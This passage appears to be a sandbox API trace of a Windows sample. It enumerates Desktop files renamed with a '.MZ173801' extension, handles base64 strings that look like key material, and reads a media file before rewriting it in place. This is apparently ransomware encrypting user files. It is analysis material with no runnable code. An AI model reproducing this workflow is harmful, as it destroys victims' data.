ftCreationTime.dwHighDateTime=0x1d5e0fb, ftLastAccessTime.dwLowDateTime=0x6c211130, ftLastAccessTime.dwHighDateTime=0x1d5e592, ftLastWriteTime.dwLowDateTime=0xaac86d62, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2f8d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sCm_S8YjQxWQT08.m4a.MZ173801", cAlternateFileName="SCM_S8~1.MZ1")) returned 1 [0124.160] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.160] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.160] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x374ae4e0, ftCreationTime.dwHighDateTime=0x1d5ef8d, ftLastAccessTime.dwLowDateTime=0xd5b99bf0, ftLastAccessTime.dwHighDateTime=0x1d5e90f, ftLastWriteTime.dwLowDateTime=0xaad458c2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17ae4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sHCpH11jen-XYoy Od_.m4a.MZ173801", cAlternateFileName="SHCPH1~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb34e00, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0xf3474630, ftLastAccessTime.dwHighDateTime=0x1d5eb3b, ftLastWriteTime.dwLowDateTime=0xaad458c2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3554, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sNSbJ9-I2i0PpN.bmp.MZ173801", cAlternateFileName="SNSBJ9~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefb61df0, ftCreationTime.dwHighDateTime=0x1d5eca0, ftLastAccessTime.dwLowDateTime=0xd8509970, ftLastAccessTime.dwHighDateTime=0x1d5e4fc, ftLastWriteTime.dwLowDateTime=0xaad6baf2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x126c8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="trdj59u.gif.MZ173801", cAlternateFileName="TRDJ59~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12594c0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xed082e60, ftLastAccessTime.dwHighDateTime=0x1d5e631, ftLastWriteTime.dwLowDateTime=0xaad91d20, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16a38, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="txD8odKDry6.wav.MZ173801", cAlternateFileName="TXD8OD~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77407a30, ftCreationTime.dwHighDateTime=0x1d5e4dc, ftLastAccessTime.dwLowDateTime=0xd92291f0, ftLastAccessTime.dwHighDateTime=0x1d5e619, ftLastWriteTime.dwLowDateTime=0xaad91d20, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16808, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="tXkulrENDM Y6hF.m4a.MZ173801", cAlternateFileName="TXKULR~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x654d1800, ftCreationTime.dwHighDateTime=0x1d5ebef, ftLastAccessTime.dwLowDateTime=0xc7e36be0, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xaae50995, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x110de, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="TZsHRoCh7.xls.MZ173801", cAlternateFileName="TZSHRO~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b6a960, ftCreationTime.dwHighDateTime=0x1d5e5f5, ftLastAccessTime.dwLowDateTime=0x470f9460, ftLastAccessTime.dwHighDateTime=0x1d5e2e1, ftLastWriteTime.dwLowDateTime=0xaae50995, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1fa4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="V6GTXq9VntApgCCTZhE.mp4.MZ173801", cAlternateFileName="V6GTXQ~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebfad40, ftCreationTime.dwHighDateTime=0x1d5eaea, ftLastAccessTime.dwLowDateTime=0x280a6380, ftLastAccessTime.dwHighDateTime=0x1d5e0f0, ftLastWriteTime.dwLowDateTime=0xaae76b36, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17e35, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="v8 HU.mkv.MZ173801", cAlternateFileName="V8HUMK~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bd28f0, ftCreationTime.dwHighDateTime=0x1d5ed71, ftLastAccessTime.dwLowDateTime=0x778ba2d0, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0xaae76b36, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x12799, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="WUbrVo Nrjfu.wav.MZ173801", cAlternateFileName="WUBRVO~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4d5cd0, ftCreationTime.dwHighDateTime=0x1d5e3b6, ftLastAccessTime.dwLowDateTime=0x2e5eb4b0, ftLastAccessTime.dwHighDateTime=0x1d5e731, ftLastWriteTime.dwLowDateTime=0xaafa7e35, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xc9eb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="x-fqzeifd646TQM_WO.mp3.MZ173801", cAlternateFileName="X-FQZE~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8ccc10, ftCreationTime.dwHighDateTime=0x1d5eae8, ftLastAccessTime.dwLowDateTime=0xf42c7fd0, ftLastAccessTime.dwHighDateTime=0x1d5eddd, ftLastWriteTime.dwLowDateTime=0xab33b708, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1460, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="X67akHe.flv.MZ173801", cAlternateFileName="X67AKH~1.MZ1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6453c8c0, ftCreationTime.dwHighDateTime=0x1d5efb1, ftLastAccessTime.dwLowDateTime=0x22cdfed0, ftLastAccessTime.dwHighDateTime=0x1d5ea01, ftLastWriteTime.dwLowDateTime=0x22cdfed0, ftLastWriteTime.dwHighDateTime=0x1d5ea01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XDnTXxKBW", cAlternateFileName="XDNTXX~1")) returned 1 [0124.161] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.161] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.161] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6453c8c0, ftCreationTime.dwHighDateTime=0x1d5efb1, ftLastAccessTime.dwLowDateTime=0x22cdfed0, ftLastAccessTime.dwHighDateTime=0x1d5ea01, ftLastWriteTime.dwLowDateTime=0x22cdfed0, ftLastWriteTime.dwHighDateTime=0x1d5ea01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bc40 [0124.162] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6453c8c0, ftCreationTime.dwHighDateTime=0x1d5efb1, ftLastAccessTime.dwLowDateTime=0x22cdfed0, ftLastAccessTime.dwHighDateTime=0x1d5ea01, ftLastWriteTime.dwLowDateTime=0x22cdfed0, ftLastWriteTime.dwHighDateTime=0x1d5ea01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0124.162] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55626c0, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x3e284d50, ftLastAccessTime.dwHighDateTime=0x1d5e274, ftLastWriteTime.dwLowDateTime=0x3e284d50, ftLastWriteTime.dwHighDateTime=0x1d5e274, nFileSizeHigh=0x0, nFileSizeLow=0x2472, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="3067xe8riKxNNoH.m4a", cAlternateFileName="3067XE~1.M4A")) returned 1 [0124.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0124.162] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\3067xe8riKxNNoH.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\3067xe8rikxnnoh.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55626c0, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x3e284d50, ftLastAccessTime.dwHighDateTime=0x1d5e274, ftLastWriteTime.dwLowDateTime=0x3e284d50, ftLastWriteTime.dwHighDateTime=0x1d5e274, nFileSizeHigh=0x0, nFileSizeLow=0x2472)) returned 1 [0124.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.163] GetCurrentThreadId () returned 0x1358 [0124.163] GetCurrentThreadId () returned 0x1358 [0124.163] GetCurrentThreadId () returned 0x1358 [0124.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.163] GetCurrentThreadId () returned 0x1358 [0124.163] GetCurrentThreadId () returned 0x1358 [0124.163] GetCurrentThreadId () returned 0x1358 [0124.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\3067xe8riKxNNoH.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\3067xe8rikxnnoh.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.163] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.163] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.164] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x2472 [0124.164] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.164] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2472, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x2472, lpOverlapped=0x0) returned 1 [0124.165] CloseHandle (hObject=0x414) returned 1 [0124.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\3067xe8riKxNNoH.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\3067xe8rikxnnoh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.166] WriteFile (in: hFile=0x414, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x2472, lpNumberOfBytesWritten=0x19f6f0, 